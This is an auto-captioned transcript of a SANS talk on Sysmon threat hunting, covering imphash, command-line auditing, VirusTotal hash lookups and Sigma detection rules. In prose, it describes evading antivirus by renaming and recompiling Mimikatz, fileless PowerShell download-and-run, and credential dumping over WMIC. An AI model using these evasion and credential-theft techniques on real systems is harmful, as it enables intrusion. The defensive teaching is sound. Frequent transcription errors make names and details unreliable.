Threat Hunting via Sysmon - SANS Blue Team Summit

Video Statistics and Information

Video

Captions Word Cloud

Reddit Comments

Captions

all right thank you so my name is Eric Conrad welcome to my talk so it's a talk on system on show you know system on it is from Microsoft sysinternals it adds a lot of amazing logging now to your Windows environment the system on logs play nicely with all your sims Splunk ArcSight whatever elastic of course you know and it gives you that that necessary visibility right so you know there's an old saying that I quote a lot by Brandeis sunlight is the best disinfectant right you need to find out where the blind spots are you need to find out where you can't see things and add that visibility and and malware especially recent malware has been very good at moving kind of quietly through these blind spots in your network right so this is a it's a Microsoft tool it's not installed natively but it does play nicely with of course you know your sim and it's got its scales globally by the way a lot of common questions we can assist Mon will it scale to a large enterprise you bet Microsoft runs it globally so it does scale to a very large environment so it gives you some new logs now and one of the best things you can do with this of course is generate hashes so you get a hash of every single process running in your entire environment that's an amazing functionality right normally you need a tool like atheneum or carbon black or a sensitive one to get that kind of deep level insight into every single process running in your environment right so that kind of visibility is critical and grabbing the hash of every running process is a really really useful thing for of course you know hunting malware once you have say the sha-256 hash you've been and upload that to virustotal get you know dozens of vendors 60 odd vendors opinions on that on that hash and we'll talk about the amazing impasse in patch the import hash is a really key feature that allows you to chase a hunt down related families of malware and I'll show an example we we took me me cats we made some trivalent trivial changes to it and got most antivirus vendors you know to fail to detect it even though it was me me cats of course me me cats is a tool to dump your plain text password your hash is your tokens things like that right so malware is pretty good at making this polymorphic code with little make trivial changes the functionalities is exactly the same but but the actual signature is different right and that traditionally is thrown off antivirus vendors as a simple you know parlor trick but impasse can help you chase down that stuff a lot of capabilities here and mark russinovich who run the sysinternals you know assists internals was a separate company of course Microsoft acquired them a number of years ago and we're worried that Microsoft would you know embrace and extend you know sysinternals meaning ruined them of course sometimes the big fish eats a little fish and you know the little fish dies but in this case sysinternals has been great it's been really improved and he's really good at going tactical when we saw a malware like petia and not petia they started moving through new ways at least from malware to like things like W make the windows management instrumentation console right which has virtually no useful native login whatsoever WM ik natively supports debug logging which is terrible from a an operational standpoint from a detection standpoint it's really not terribly useful operationally or advisable to turn on w make logging say globally that would be very expensive you could harm operations and so mark russinovich saw that petia not petia was moving through tools like w mick these tools had very useful native logging for our sim for our sock and he added w make logging to system on like a few weeks after petia started using that right and of course we know these these malware variants petia not petty and not petty is now estimated to have caused over 10 billion dollars in damages ten billion dollars once you're in a malware and moving through these fairly secret channels so Mark's been very tactical adding features to system on allowing us to actually see if not prevent that malware ideally but at least detect it when it starts moving right so here's impasse it's an interesting take from mandiant they're like okay instead of hashing the signature which is trivial like a flip one bit in that binary and suddenly the sha-256 hash no longer matches what if instead of hashing the signature of the binary what if we actually hashed the the list of dll's that are loaded the names of them and the order right so instead of it just get into ChaCha five six hash among other hashes of course it says Mon supports let's hash the list of the DLLs and the order they're loaded this allows you to catch related families of malware so someone takes a piece of code like maybe cat says you're gonna see I I did right make some trivial changes to it the impact is going to be the same now of course we have this thing we talked about called the perfect solution fallacy the perfect solution fallacy is when you have a good idea like hey let's fight malware let's track malware by tracking the impasse some will often graze a hanger well you know of course a nation-state would change the list of the DLLs they rearrange the order they had a different one in just to throw that off of course we call that the perfect solution fallacy the purpose lucien fallacy is a fallacy because it states a solution is not useful unless it's perfect in all use cases and of course we don't believe that if we believe that we wouldn't use firewalls with Whitney was antivirus we wouldn't use anything because everything fails that's why we have defense-in-depth so sometimes do come back to work on Monday you have these ideas for new things to try so I might try to shoot them down not because they're bad ideas simply because they're different right people like to fight change some people IT people build entire careers fighting change these people actually harmful and toxic in your environment they think they're well intended but it's it's mainly a fight for status quo and as I've told many of my clients status quo isn't working so let's look at how a man diadem trend speaking of mandiant so of course me me cats allows us by Benjamin Delpy hilariously Benjamin Delpy wanted to teach himself how to program and Mimi Katz was his project well mission accomplished my friend right you got it done right so we wanted to eat himself out a program he wrote me me cats this tool was so explosive it initially was closed source it was so explosive that he was invited to a conference someone went to the country he was brought in to a conference at a foreign country if you google me me cats Wired magazine you'll see this article he was invited to a conference in a certain foreign country and the back when Mimi Katz was closed source that's now open source of course but he was invited to a conference in a foreign country his internet went out he went down to the front desk leaving his laptop behind the front desk kept stalling he went back in his room and found someone in the middle of what we call black bag operation they were typing furiously on his keyboard trying to get the code he's like hey what's up the guys like oh sorry wrong room wrong room and just storms out so some nation-state wanted him so badly they lured him to that country under the guise of a free trip to a conference and they try to steal me me cats right so interesting so it does a lot of things on Windows 8 and lower especially it's very very usefully useful plaintext credentials in RAM so we have tools now like petty and not petia who are injecting me me cats in the end of the system dumping the plaintext passwords and using that to move laterally right and we predicted I've talked to Seth and understand as instructors for years we predicted for years that malware was gonna get smart most malware was tremendously dumb in the past right you saw worms like conficker and the way they pivoted was they'd launch an exploit for conficker is MSO eight oh six seven you'd own the box and then we keep launching exploits that lost more lots more boxes so you've a thousand systems to one patch for that patch MSO eight oh six seven two went down end of story pens have stickers gets a lot more than two though the pen test gets a whole lot more than two why we own those two we get system ideally on those boxes and then we inject me me cats and we dump the usernames the hashes the passwords the security access tokens and others and we steal credentials and move laterally right that's how human pen testers move right now we're never moved like that until about two years ago you know it you know the alleged it and I say a hacking tool kit leaked malware combined the NSA hacking toolkit ms 1701 o against SMB of course eternal blue married that with a human style pivoting campaign and ten million dollar ten billion dollars from one strain of malware right so let's look at me be cast it's an important thing to detect of course in your sock and they're saying a lot of people alter me me cats a lot of these nation-states out you know criminal actors crime gangs they'll alter me me cats and off often trivial ways to avoid detection so I I was in my lab and I was reading about this and I thought well how hard it's that you know how hard is it to alter me me cats to evade antivirus detection so I downloaded me me cats from Benjamin Delpy site the actual exe 70 percent detection all right pretty and then I compiled from source I've made no changes whatsoever I simply compiled it from source and over half the vendors can no longer detect me because I hadn't changed a single line of anything I simply used as this nation-state tool called a compiler oh that dude you stick a pilot Wow you know and I was so Clem I am no Windows software expert on that front like I'm not a Windows developer I've compiled thousands of things on Linux and UNIX I can't remember the last time I compiled anything on Windows like I literally had a Google free Microsoft compiler that's what a newb I am on this front Oh Visual Studio ok I can do that you know I'm sure it could pile something back in the bowl and C++ days or something but it was a million years ago all right so I Google from you know free Marcus off compiler when does compiler download a compiled and over half the antivirus vendors are flummoxed by that nation-state ha ha move right and then I changed me me cats the me me dogs and I got 7% AV detection I was literally giggling a lot like a little kid in my office I changed cat to dog it's all I did that's all I did and most of the vendors are gone and if I haven't convinced you the blacklisting antivirus is largely it can't it catches the ankle-biters that's what it does right now of course the vendors have moved on they've added heuristics so they had to but it's a static scan of a binary is a pretty weak test on that front right and as you see here this dog can hunt my password on this system was this password that this passphrase is uncrackable which was a great password until I showed it to you all you folks right but I trust you don't worry about it right so again Windows 8 and lower unless you've changed them plaintext credentials sitting around a Windows 8 end of life in January tick tock tick tock all right Windows 7 sorry Windows 7 Windows 7 end of life in January tick tock on that if you haven't begun your Windows 7 you know replacement project well get going ok hilariously so I uploaded the virus total and a few hours later Kaspersky was now hot in the trail of a notorious hacking tool call me me dogs right which has never existed anywhere except that laptop and virus stole right a few hours later 13 few days later 20 six your corporate antivirus today has a signature for me me dogs and that's my way of saying hi to my homies how's it going right Conrad says hi right and you know some people complain about you know the economy I'm growing the economy I'm a jobs creator I'm creating okay so then hilariously my pen test friends started emailing me saying hey Eric can you make me and me me something but don't upload it to virustotal cause I don't want them to know I'm like hey special orders don't upset us of course of course I'm a service-oriented company so I made me me Apes and me me pigs and I also made me yaks cuz I thought yaks was clearly funnier than even dogs we can all agree on that right maybe the axe is clearly funnier so even though kaspersky had figured out maybe dogs they hadn't figured out maybe yaks cuz I changed three more letters right if you're wondering how much work it takes to pull off this nation-state style attack haha you're seeing that the sum total of the effort there on the top screen now that's a bit of old-school command line kung-fu a middle school UNIX admin so what I did was I made a temporary directory I unzipped the source code I renamed to directories the two moves or two renames right from Kathy ACK I did recursive fine to rename every file from Kathy ACK that leaves the substrings right how do I change a string in every file the obvious way is to open it up up in an editor edit them I'm too lazy to do that do that I'm not going to do that right so I said I do a streaming edit i tar everything up which just combines all those files in one big blob I said into a streaming at it flippin Kathy ACK and then I saved the file then I compile so I made a whole bunch of these to my friends my pens has friends and they were you and this one I applauded the rest I didn't I didn't upload me me apes I didn't upload me be pigs I didn't cetera yeah but my pens has friends they got seven percent detection or so and they used them to a great advantage right but in patch isn't fooled by this impasses the fool at all so when you use a tool like sis Mon and you grab the running hash is a very process I can easily evade your sha-1 check where sha-256 check however the impasse check is going to take more work again perfect solution of fallacy I can evade that too but if I'm making simple changes to programs to evade antivirus detection which is how most antivirus works today or most malware works today the impasse will catch me so impact is a very useful feature out of Mandy and I recommend well installing system on of course but grabbing the impasse and if you have a piece of malware hunt for that impasse just in case is related variants that you're not recognizing as it related variant you can catch it that way very very useful I've just begun you know BC research on impasse I think the the potential is huge and currently largely untapped so let's use that system I'll get you that for free you can also do some other hunting through system on of course you can look for unsigned stuff now is it unsigned binary always malicious no it's a signed binary always clean no of course not you'll malware authors to sign their binaries to but on side is interesting right unsigned it's worth looking at right most malware is unsigned now any many malware author can buy a code signing cert or they can steal one perhaps you know but if you were hunting through data and you're wondering what to focus on in your sock things that are unsigned are useful to look for also you can say okay don't show me anything signed by Microsoft don't show me anything signed by Oracle don't show me anything signed by Google whatever right scan all this data feeds in through native windows event logging you've already got a sock that's already sim that's already ingesting that stuff somehow it's pretty easy to actually search on this stuff and do threat hunting through data like a lot of people view threat hunting as a NSM exercise a network security monitoring exercise we've always hunted through packets if you've done IDs work we've always hunted through packets but a lot of socks don't hunt through their CSM which is continuous security monitoring you know simply put n SMS data in motion and C SMS data at rest you know network security monitoring continuous security monitoring right and we've always threatened hunted through NSM but I see plenty of Sox who aren't doing any threat hunting through CSM through their actual log files right so add that threat centricity and when you go hunting again unsigned binaries or signed by honorees by vendors you don't trust your recognized as a useful step if you don't do system on you can still get a lot of this goodness to event 46 88 I know almost every talk I mention this because it's that good 46 88 the security log you've already got that log but you don't the full command line unless you made those two changes right you make those two changes you get the the entire command line right and since Paul gives you a whole lot more than that including WMA clogging registry logging got a whole lot more but if you want kind of a delight version of that without making a big change in your environment simply tweaking 4680 a to give you the full command line as I've said previously if I had if you put a gun in my head and gave me one log file this would be it in a sock I want more than this but I only get one this is the one I want so let's look at how malware is evolved what I showed you previously was an actual fat Exe you know Mimi yaks dot exe Mimi dogs exe and your corporate antivirus is done a really good job at killing that stuff right it's done a really good job to kill on that stuff and so Matt we're of course is evolving if you're you know garden-variety antivirus is gonna squash some piece of malware it's an advanced piece of malware they're gonna evolve to avoid that so we go on file this now right a lot of my worth coming in through PowerShell PowerShell I love all people wring their hands of a PowerShell being used for malware my clients I see online on Twitter people suggest and we somehow blocked PowerShell sigh come on come on you know you know saying malware moves to PowerShell on Windows is like saying malware is bash on Linux no one ever thought about deleting bash as a result right so we need to get that that sunlight onto PowerShell when disk yer PowerShell and understand how the malware is using PowerShell the malware is living off the land we call this things lul lul bins now right living off the land binaries lawl bins and malware is learned and good pen testers have learned don't a stall malware just use what's there right PowerShell is going to be whitelisted if there is whitelisting PowerShell is going to run in some form right so look live off the land good pen testers do that and advanced malware does that to his Metasploit file ass model so instead of saving some dot exe to the file system as I showed you earlier we won't save anything of the file system we won't save a bite we'll just use this giant long command line so a lot of malware does this or the net web download client string have this John command line that's compressed into base64-encoded convert the base64 uncompress it run it right so it's 24 hundred bytes long its massive and natively in a Windows environment you don't log any of this unless you've added system on Oh you've added laden prevent 46 88 right so it's also invisible your antivirus that does a weaker job of this because nothing's saved and there's nothing a large unless you've made those changes we talked about so again very common thing file this now we often see PowerShell launched by CMD that's another very typical maneuver by malware how often does one of you one of your program is open up CMD a terminal and then type powershell exe inside that terminal not not common for a person to do that but lots of mad weird dudes like CMD slash slash see powershell dot exe blah blah blah invoke expression and off we go right when you uncompress and confer at the base 64 back and get this giant blob I recognize that's a bit of an eye chart it is by design and just impress upon you how much is going on there right all those function names are randomly generated on the fly they are quote high entropy function names meaning they're randomly generated to avoid any kind of blacklist thing if I called my function evil function every you know evil evil function whatever some vendors going to look for the string evil function so I'll generate it on the fly randomly high entropy strings though shout out to mark Baggett by the way he wrote a tool called freaked py to do frequency analysis directly as a result of taking 511 what's F we're trying to find a programmatic way to detect that kind of stuff detector and alee generated exe names randomly generated domain names to main generation algorithms BSF looked at it we didn't get very far and I'm mark bag and figure that out and it's called freaked py you feed it a corpus of data like you know Windows Exe names from your install image and it tells you how likely other names how similar other names are to that or unsimilar and you find the ones that seem very unlikely based on your existing names works really what does detect that kind of stuff again lots of love lots of advantages so set execution policy is not a security control if you're wringing your hands about allowing ps1 files to run there's all kinds of ways to run ps1 files without actually without triggering this and what I just showed you works fine so said execution policy is not a security control it's not gonna protect you from any pentester or any semi-intelligent malware just a quick review on deep blue sea alive talking about this before but I I am updating it now in in preparation for the final Derby con right here in Louisville in September so the final Derby caught is happening in September I'm updating that talk now I'm updating that tool now so I very much I'll be there either way but I very much hope to speak there as well in September so I'll see you there the tool I wrote for Derby con a couple years ago I've given a couple of talks on it I've updated a bunch and it's a way to basically threat hunt through what is event logs right so one thing that you know it's interesting in Sox I've said this before if no one in your sock is scripting you have a substandard sock and that's a very unpopular statement but I stand by it if no one in your sock can or does script you have a substandard sock and I literally was speaking in Miami last year my wife came with me it was January Miami and we live in me and you know and I said that in a room about this big and my wife was sitting in the back and people said I was like kind of quietly booing and muttering when I said that yeah they didn't like what I said if no one in your sock is scripting of a substandard sought because they had sorry a substandard sock you know the reason people don't want people scripting in socks if they want people in socks to be 22 years old you know all of them now hey if it's 80% 22 year old kids no problem at all if it's a hundred percent you know that's not gonna work right so adding some script ability is a key element in your sock right and whether you use deep blue CLI or take some ideas from deep blue CLI I was in the sock for one of the world's largest retailers and they kind of like you know took the boo CLI look to the things that it was doing that they weren't doing and added it to their tool meaning that they scripted it they used Python in their sock that he was elastic and they added the functionality so whether you use deep blue sea lie directly or take ideas from it I'm happy whatever whatever value you get from that that's great a lot of stuff at catches including of course this month and so basically years of thread hunting experience defending networks over years you know deep white we're gonna talk about actually discuss next sorry and a lot of good thread hunting goodness you know boiled down to two one tool the the native visibility you get out of this monitor of course than 46 88 and other events as well so it'll also do that when you showed it that big giant compressed command they'll recognize that it'll actually unwind it so it'll see its base64 it'll Dakota base64 automatically it'll see us compressed after that it'll decompress it right and then it'll scan this stuff below that right and there is this funny Daniel Bohannon have that has it's invoke obfuscation tool invoke obfuscation is scary if you haven't checked that tool out look at it and invoke obfuscation really kind of it it makes keyword searches pattern match it's pretty much useless right so all kinds of ways that you know chop slice and dice that stuff another thing deep deep blue does is it looks for obfuscated commands statistically so it says okay what percentage of normal characters is in this command line if you see you invoke obfuscation there's all these back ticks and weird octal characters or whatever binary characters this is okay what's the percentage of normal alpha and this in this command if it's above a certain threshold below a certain threshold alert on that so it also detects obfuscated commands not by patterns cuz that's not gonna work excuse me but by statistics right I'm gonna unwind that stuff automatically and here's some of this nasty malware we're seeing now human style pivoting right so human style pivoting where it gets into a box so you you're missing one you get a thousand systems to unpatched right ten years ago malware hit - that was it all right now malware hits - uploads me me cats dumps to usernames dumpster hashes dumpster the plaintext passwords steals the security access tokens right the security access token is what grants your domain privileges to the local process if you're a domain user and uses not to move laterally right and Wired magazine had another great article on the shipping company mask so Marissa got hit with will not petia and their entire 88 infrastructure globally was taken down within minutes right their entire Active Directory infrastructure was taken down within minutes they had no viable backup right and the only reason they survived that well it was an act of God there's a power outage gaana what had happened so when the malware hit it was a power outage in Ghana and an Active Directory controller was offline the only remaining copy of that database was sitting at a power down PC in Ghana so they called Ghana and said unplug everything now before the power comes back you know and grab those disks and fly to London and they couldn't fly to London to do a visa issue so someone from London had a flight in Nigeria some from Ghana had to fly to Nigeria they met in the middle they handled this off they went back to London they recovered their ad infrastructure globally from that right it was just it was crazy crazy malware and they were they were impacted that Dale day alone lost billions of dollars and mercy does those giant shipping containers right and you've seen them all over the world I'm sure and you've got like 18 wheelers backed up for miles at ports the whole thing was crippled they fell back to paper and pencil pencil managing that stuff right and people would call them customers are consoling I got all this food in these containers that's rotting we just miss our Christmas but we didn't miss this we just miss that we're losing millions and and Mirth said okay how much did you lose 1.2 million dollars blank cheque here they were literally handing out checks just because they had to survive a couple of things they had to survive the malware they had to survive the lawyers too you know there was a lot of attacks coming in them from malware legal front getting sued so they could have lost the company do a lot of reasons they were just handing out checks to survive that issue right and that's what this malware is doing now one gets in it can be quite destructive of course there's a series of mistakes that led to that and involving their credentials manually synchronized local admin passwords etc etc but it was it was damaging right and the city of Atlanta got hit with Sam Sam right so not petia was not ransomware it was destructive malware simply destroyed your systems there was no ransom to pay Sam Sam is ransom or so Sam Sam allows you to get the data back or get the key to encrypt your data so it encrypts everything holds the key hostage right if you have bad backups well you know game over right I'll give credit to city of Atlanta they refused to pay the ransom you know they recovered normally which was a lot more expensive than actually paying the ransom and there's a moral issue there right there's an ethical issue there right do you pay these criminals there's money because where does that money go they held firm and they recover but they were crippled for sir only weeks and longer right and it moves to wmii and PS exact which offers again virtually no useful logging unless you've installed system on here's an example PowerShell command on a track now why am I using this it's a very common way you know I've shown you now three ways to run me me cabs right there was the fat exe named way which your antivirus is a good job of detecting today generally there was the Metasploit way which is the giant compressed command-line way and basic c4 encoded there's also the invoke expression web invoke expression does it kind of a double you get style download run this thing on the fly right PowerShell is going to be there on any recent system of course right nothing's logged natively again unless you change some stuff added PowerShell logging or system on logging or event 46 88 and again sunlight is the best disinfectant this works really well and here's a lot of this created so this is event yeah so this event 46 88 right here and if you turn on the the full command line auditing you get the whole thing is right there it's a piece of cake to find if you're looking for right it's not hard to find this stump again there are ways to obfuscate it's not hard to find this stuff right and so W Mik is interesting give a shout it to ed SCOTUS I'll try to figure this stuff out is an old saying do what I mean right do what I mean it's not working do what I mean you know and I wasn't seeing any output because it's it's outputting on the remote system so our morning commands I'm burning me me cats I'm not seeing any output the outputs being displayed remotely so you can do a trick where you basically Krita share and I have it log to the share if you want to grab those credentials of course right and here it is here you don't actually see the output but as you see here you know I ran the command and I dumped the creds to a share and then I opened up that share of course that file on the share to read the credentials here it is here so see pone me me text there it is right there and here's the event log view very common for tools like power sploit use this encoded command so if you have a sim the can't decode dish you're in trouble so I gave my talk on deep blue CLI derbycon I came off the stage and you know a whole bunch of questions like well I want company you know I I paid a three thousand dollars for company exit sim and how do I do the deep blue sea lifestyle stuff how do I like decode that some sim scan some sim scamp you know some sims we're going to limit you to base your keyword search and a keyword search you know it's saying you know base64-encoded command is gonna be very noisy right plenty of non malicious things do that right so I'm like well grab the Windows Event log and parse the XML and the guys like well you know my tool can't do that well how about this my tool can't do that how about this my tool can't do that I said how much you to pay for that tool $300,000 like well maybe it's time for a moment of introspection you know if my free script can do it you know I get back to the the scripting angle right programming right or having vendor tools that can do this kind of stuff of course some vendors can I'm not throwing that stone but some camp right so but programming allows you to kind of marry those two worlds right so here's deep Lucy live versus these all right and we have a send notice it scans it the first one is easiest scans it twice right so this is okay you know we got a suspicious command line download be a net web download client string we could me me couch etc the second one's a bit more interesting it says I've got a lot of base64 encoded characters so why don't I decoded at automatically right so it decodes that automatically and then re scans that normalize content now it has that string it sees you know invoke object and that web book expression rather and that web download client string etc alright so I was wondering how to leverage the goodness that system on gives us especially those hashes you know cuz again that kind of visibility to see the running hash the hash of every running process in your entire company that's powerful visibility again you don't normally get that with a tool like taenia more carbon black and how can i leverage that right and we just slide in five eleven screw to five eleven four years say hey you know here's an idea use this mona vent one grab the running hash grab the hash from every burning process said that to virustotal for free by the way there's a free api to do that and check it out we had that slide for a long time and then i thought well how about I just write that you know why don't I just when I do that right so we did that turns a virus total has a free API you can pay for more access but you can get one submission every 15 seconds for free right and obviously people hesitant to send you know files to virustotal because hundreds of thousands of researches slash security companies have accessed that spool so a lot of people hesitant to send files to virustotal for privacy reasons I get that but the hash is probably safer that way right so send the hash and bacey generator whitelist so so take your Windows 10 install image grab a shot - five six hash of every Exe on that thing right that's your whitelist and then what would deep wide says okay check the whitelist if it's not in the whitelist look it up if it's malicious obviously tell you right and once I've looked it up don't look it up again right unless you want me to many what right and so what happens is even a large environments we've tested this out it deep well it will get busy for a bit cuz of course you have things that are not on your install image chrome updated since then etc etc etc right so you've got things that aren't on your install image but even at a large environment you've probably got hundreds maybe thousands but probably not hundreds of thousands of those things unless you're a huge shot right you've got hundreds of thousands of new things that aren't on your install image fine virustotal deep white will start submitting if it has more than one it's tomato to sleep 15 seconds right and I'll kind of churn through that queue and you've got 60 odd antivirus vendors opinion on that on that binary and it is it is Magic Man it is magic all free tools all that was free right and by the way for my Derby con talk I'm gonna add this functionality unless someone's done it you somebody you know Mike pours a line on this every script you thought about writing someone's already already written it just go find it you know so if someone may have done this but I'm gonna take bro slash they renamed bro to Zeke of course you know take Zeke logs and do the same thing with Zeke is my idea unless somebody beat me to the punch in that case I just talk about what the awesome stuff they did right but Zeke the newly renamed bro bro was named after the IDS after Big Brother Big Brother's watching you then of course is gonna associated with bro culture which is not their goal at all so they renamed it Zeke in honor of the dog from the far side cartoons which is awesome right so now Z now we say bro Zeke just like we say s LT LS now right and but take Zeke can also auto carve exe s grab the hash submit the virus totals my idea unless somebody beat me to it in which case they're awesome right and this works really really well and so it basically there's an old saying from programming if you typed it twice you should have scripted at once right that's old school you'd existed man you know a wisdom I've manually done this more than once I can tell you that manually grab the system on log manually grab that hash manually copy manually paste in the virustotal look and that is of course is me me cats right and so I've done that more than once and I finally scripted it of the various hashes I tried I mean you see as I mentioned previously system on does all kinds of hashes sha-256 seems to be a good trade-off between security and usability and portability now here's me me cats now don't freak out if you get a one hit or two hits like I did okay so I got one hit and this one hit was from the security 511 windows VM we've handed out to thousands of students right so I run deep white on the security 511 windows VM it gets a hit and I start hyperventilating I'm like it's infected I've given us a thousand of people like I I need my career's over I need to like get a new name and change my identity and yeah my mind was racing ahead to all the failure well wait a minute one hit what is that what is so don't hypervenom don't completely lose your mind like I started to if you get one hit right and so why do you get one hit well Sophos doesn't like PS exec now admittedly well it's a PUA potentially unwanted applications but it Flags as a virus that's not a virus but I mean he's exactly you know bad things have happened to it but it's not a bad program which is bad things are done to it okay so take that with a grain of salt also sometimes I don't know who the hacker is the only time I see the hacker is when they're not detecting something or they're falling on some of us you only notice them on that list but anyways I'm not sure what they're doing over there but if it's not signed they crank up the heuristics so the piece of software is not signed the heuristics are cranked up to 11 does Microsoft sign everything no they sign almost everything now they sign everything just about but there's a few older things dotnet framework stuff whatever that might not be signed so clearly give it more scrutiny but if they download from Microsoft comm I'm not terribly worried about it right all right all right so let's shift gears a bit Sigma so we have this kind of Tower of Babel now where I mentioned we have NS m and we have CS m and we'll get Splunk we've you know Splunk or ArcSight or elastic all great tools all different syntax on the NSM side we've got snort sericata which have you know pretty much the same rule language but then you get bro zeke which is totally different right and you want to search for this one thing I want to find me me cats in Splunk I want to find me me cats in art site I want to find me me cats and elastic I want to find me me cats on snort or sericata or bro you'll end up having to hire all these experts who know all that stuff now maybe you probably have one major sim like a major commercial vendor but you might have to well a lot of socks I see have the tactical sim right so the compliance people insists you know if you go to sock and they're bragging about how many millions of events they handle per day that's that's the wrong sake that's the wrong mentality it should be quality not quantity right and so I do see socks with two sims right you get the compliance sim which the compliance officers love and you're handling 10 million events per day haha right and and often these things you know it's not the vendors fault they're they're the budget wasn't big enough too much data was thrown at that thing and it's slow right so you do the big on some of these big vendor searches you do a search get a cup of coffee come back the search completes right that's to compliance sim and I've been in Sox I'm like hey you know how about how about we have less data in that sim how about we snot strip and stuff up like no Eric we need this for compliance purposes this is our compliance engine like well if it takes five minutes to make a search compliance is now harming security you know it's actively harming security right and I was in a sock once it was just like that seven minutes first search handling 10 million events per day and I'm walking through that sock and on the screen I see secure you know the new elastic version of security onion like oh cool security I love that what I think it was just he shushes me don't tell anyone like what don't tell anyone you saw that I'm like why if management finds out we're using this they'll take it away and make us use that awful thing and we don't want it we don't so what happened that they literally went and kind of begged borrowed stole hardware put it in the closet literally hid the server and the compliance sim got tell me at 10 million events per day and and security on you got like 1% of that right and what they would do they do security onion day-to-day and when they found something they needed the deep dive on the compliance data they made the deep dive right so day to day tactically they use of tactical sim then deep dive on the giant compliance repository right and that's how they got through today now I'm not saying on a whiteboard draw to Sims no one would do that but hey if that's what gets it done in that environment given the politics and the regulations and everything fine but now you get two sims to search on two sets of logic two syntaxes etc so we had this tower Babel style stuff and a lot of it's hard to I want to I want to Splunk expert with five years of experience that's gonna be expensive you know it's gonna be expensive right because those people were in massive demand for obvious reason right so how do you kind of manage this and this total Sigma is it's the kind of tools like why didn't I think of that you know I already wrote deep blue sea a lot I was like close to that you know but this is just genius it's just genius what if we come up with a universal language of a piece of our we have a universal language for piece of malware right and we kind of distill it down to its elements right and we write this kind of did this meta rule this met a rule describing me me cats or whatever right and then once we have the meta rule we have a parser just generate Splunk output or you know elastic output configuration to me or up the PowerShell syntax or grep syntax or ArcSight syntax based on this meta rule so right this universal rule and they just run the parser and it would do an output plug-in and create Splunk or arc side or whatever it's really cool really really good stuff i've been playing around with it a lot building up this talk and man i am quite impressed i've already good ideas I'm gonna distill some stuff from deep Lucy a lot of this thing's not doing and actually submitted over that side I don't need you use deep blue CLI I just want to help you know I just want to help the tech stuff however that happens I'm on board words right so Sigma is this kind of rosetta stone to unlock all these languages and it also allows more junior staff to get more done yeah I want some senior folks in a sock but it can be mostly juniors if I have 80% juniors and 20% seniors rock and roll rock and roll right but it helps them move faster as well right so what would it take to do this can we distill a malicious event or software down to its elements you describe it through strings whatever port it's using the British rerun key it creates whatever that thing is distill it down to its basics its fundamentals write a rule in yam along map and then create these outputs right for Splunk whatever and that's Sigma very impressed right so what snort is to network traffic Yarra is the files right so no one of course being NSM that were security monitoring and cuz snort has become the universal language outside of bro slash Zeke that snort rule is pretty universal you know you news that snort rule in since our kata you use that snort rule and you know a number of vendors you know firewalls next-gen firewalls things like things like that forty gates for the Nets they use snort syntax so snort kind of became the universal language of NSM outside of bro Zeke but almost every other IDs understand snort rules takes know what rules directly we have something similar that for the CSM side we never had that now Sigma does that really nice tool so here's that that rule I talked about right so title office macro start CMD and it's a description references and it's looked using now system on event one right so give me system on event one and if I see the parent image being windward or cell right and those things launch CMD you tell me right so instead of writing that in sports will do it it's plunk in a minute but started with a Splunk rule or starting with the ArcSight rule or starting with the elastic rule let's start with the fundamental idea the logic of what that thing is doing what am I she's looking for describe that in this kind of meta language and then create these output plugins right so I'll create once they have the Sigma rule I'll say give me the splint for each of that or the curator version of that or the grep version of that or the powershell version of that right this allows us to thread on across various platforms and again I'm quite impressed by this it's a clean idea it's very well executed and even if you don't end up using Sigma what you can do is like look through the rules that it'll quick I do a more formal demo in a bit but here it is here and playing around with this earlier of course right so let's look at a system on rules so let's look at these so here the system own rule so if you don't use Sigma you just look at the rules see what it's doing so those are all the system on rules oh list the system on rules for you know ATS various exploits cobalt strike beaconing me me cats of course malware drop a password dump or powershell exploit things like that you don't you sigma directly you can go through a list of rules and see what they're looking for you know and then oh that's interesting for that like you know windward launching CMD i never thought of that right so it's all good thread hunting ideas in here and of course then you get to direct syntax to do it which I'll show you momentarily right it's not just this month it's all kind of stuff yep they come with Sigma this is straight from great so question is these rules come with Sigma yeah right from the github set you know and it write your own it's very easy to write them actually but these are straight from Sigma themselves and then a lot to your point a lot of people end up writing their own as well you know so instead of writing if you want to write your own custom rule you can write it in Splunk or our site in elastic but is probably better write it here this way that way you can output it any way you want right super useful stuff right so we got built-in rules malware rules let's go to malware ones this is for Windows now of course right and lots and lots of system on rule so again if you turn on system on logging you get all kinds of good stuff it's just not it's not just command line auditing it can watch the registry it can look for persistence mechanisms lots of things sis spawn can do to give you that visibility right so I'll come back to that momentarily I've run a few commands to show you how it works so again playing sexually mo file easy schema this metadata log source detection and condition and here's a kind of a rule now sis Madhavan to eight and it's called PowerShell run dll 32 remote thread creation right it's grabbing a system on event 8 which is create remote thread right looking for source image PowerShell target image run DLL she could PowerShell launching run DLL 32 a common way to inject dll's another way to avoid antivirus of course is to eject dll straight in the RAM right so that's another common way sis spawn gives you visibility into that a one-note on system on from a performance hit you can log every DLL as it's loaded that's actually useful but that can be a performance hit because like PowerShell is gonna load like 80 DLLs or something right so you can log like the hash of every single DLL loading which is amazing visibility but that can be a performance edge just FYI this bond runs like a dream that's really want to be careful of I mean it's a trade-off I want that visibility but is it worth the cost kind of thing right but there's other ways to buddy we're both thread creation things like that right and we have classifiers now so we have groups of products squared pfSense semantics note windows we have a service weave description and again the list of supported outputs is pretty amazing you probably use I mean you have some of these tools whether it's PowerShell or crap but I'm sure everyone here has has a number of these tools maybe three or four to to use so it's pretty simple sigmak I want the output to be the the syntax to be PowerShell syntax and I want to do system on suspend PowerShell run DLL 32 and bang it literally gives you a command line of copy/paste so you grab that commit the only thing just a pro tip on the PowerShell stuff it doesn't you have to put the log in and see it says get win event pipe to where if they tell it which log you want to look yeah because it can process both a saved event log or the live event log depending on how you're doing it right so if you save the EBT X file put it right up to the get win event put path whatever right or the live event log so if you copy paste in this you're playing around with it you just have to tell it which event log to look yet in this case would be the system on log of course operational etc right and that's the PowerShell syntax here's the Splunk syntax right Sam exact event and again the beauty of this is you write one rule and then book the Rosetta Stone unlocks all the stuff really useful stuff right you're really useful stuff I've got a ton of ideas going through those rules I'm sure you will as well and also here's Kabana right so here's a Cabana rule right and again training a big move in elastic now elastic is disrupting the same industry in a good way right a lot of vendors are adding elastic on the back and elastic is basically big data for you know lots of stuff Big Data open source but a lot of IDs vendors are moving to our sim betters are moving that way there's a huge demand for elastic talent now right so you know and a lot of companies are nervous about moving to elastic because they don't know how to use it you know the syntax understandably so how do I support this thing who's the vendor again and but this helps you kind of you close that gap right let me do a little demo now all right sis Mon let's go Ghost pack so I'm looking for the sis bond Ghost pack safety cats yeah mo yml I'm getting the PowerShell syntax so you've been literally just copy-paste this thing right in right into PowerShell just just add which event you log you're looking for or of course let's let's look at the let's just 